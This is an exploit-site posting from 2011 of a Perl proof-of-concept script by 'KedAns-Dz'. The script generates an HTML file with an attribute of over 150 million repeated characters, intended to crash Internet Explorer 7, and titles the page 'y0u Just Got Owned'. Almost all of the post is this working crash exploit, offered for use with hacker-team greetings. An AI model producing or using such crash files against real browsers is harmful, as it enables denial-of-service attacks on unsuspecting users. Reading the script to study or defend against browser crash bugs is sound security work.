[D] PERL : Internet Explorer 7.00<=5730.13 (.html) Local Crash PoC [z]

2011-01-22 16:04:09
Posted by: kedans

=-=-=-=-=-=-=-={In The Name Of Allah }-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# [D] PERL : Internet Explorer 7.00<=5730.13 (.html) Local Crash PoC [z]

# Author : KedAns-Dz < Ked-H (at) Hotmail (dot) com >

# Team : [D] HaCkErS-StreeT-Team [Z]

# + Allah Akbarr + Algerians HaCkErs

# Type : Perl

:::::::::::::::::::::::::(0xSTART):::::::::::::::::::::::::::::::::::::::

#!/usr/bin/perl

#////-----------------------------------------------------------------
# Discovered By: kedAns-dz
# Date : 20/01/2011
# --->
# Tested on WindowsXP sp3 FR - 32bit -
# --->
#########################################################
##Usage-->>file created-->>load file-->>k_IE7.html>>BOOM!
#########################################################
# ////-----------------------------------------------------------------
# Start Perl ::=>
#START SYSTEM /root@MSdos/ :
system("title KedAns-Dz");
system("color 1e");
system("cls");
$file="k_IE7.html";
print " =========================================\n";
print " = Windows Internet Explorer 7.0 PoC =\n";
print " = Remote DoS/Crash Exploit =\n";
print " =========================================\n";
sleep(1);
print "\n";
# INFO:
print "------------------------------------------------------------\n";
print "[*] Exploit: Internet Explorer 7.0 Remote Crash Exploit\n";
print "[*] Date: 2011/01/19\n";
print "[*] Author: KedAns-Dz\n";
print "[*] Version: 7.00<=5730.13\n";
print "[*] Tested On: WIN-XP SP3 FR & AR\n";
print "[*] E-mail: [email protected]\n\n";
print "------------------------------------------------------------\n";
print "\n";
# Preparing PoC < By KedAns-Dz > ::=>
print " Please Wait Till c0de Generate...\n";
my $buffer="\x41" x 100000000; #Buffer
my $buffer1="\42" x 55900000;
my $titl="> KedAns-Dz <"; # Title
# Bo0M !! ::=>
open(myfile,">>$file"); # b00m on here
print myfile "<html>";
print myfile "<title> y0u Just Got Owned By $titl </title>";
print myfile '<head><meta http-equiv="refresh" content="1; url=k_IE8.html"></head>';
print myfile "<body bgcolor = rgb(0,0, 0); alink=";
print myfile $buffer,$buffer1;
print myfile '">';
print myfile "</html>";
close(myfile);
sleep(1);
print "\n";
print " [*] Creating .... \n";
sleep(1);
print "\n";
print " [!] File Name : '' $file '' \n";
print "\n";
sleep(1);
print " [+] File Created Succesfully ! \n" or die print " [-] File Was Not Created ! \n";
print "\n";
print "-------------------------------------------\n";
# By KedAns-Dz
:::::::::::::::::::::::::::::(0xEOF):::::::::::::::::::::::::::::::::::::::

# [D] HaCkerS-StreeT-Team [Z] > Algerians HaCkErs <

-- [>>] KedAns-Dz * BadR0 * XoreR * Dr.Ride * Fox-Dz * Red1One [<<] --
-- [>] IslamPard * NoR0 FouinY * Zaki.ENG * Hani NiN0 * MasSinh0u-Dz [<] --
-- ]]] Mr.Dak007 * TOnyXED * Ctika_06 * Dr.html * Sh311@dz * all Dz [[[ --

Fixes

No fixes

In order to submit a new fix you need to be registered.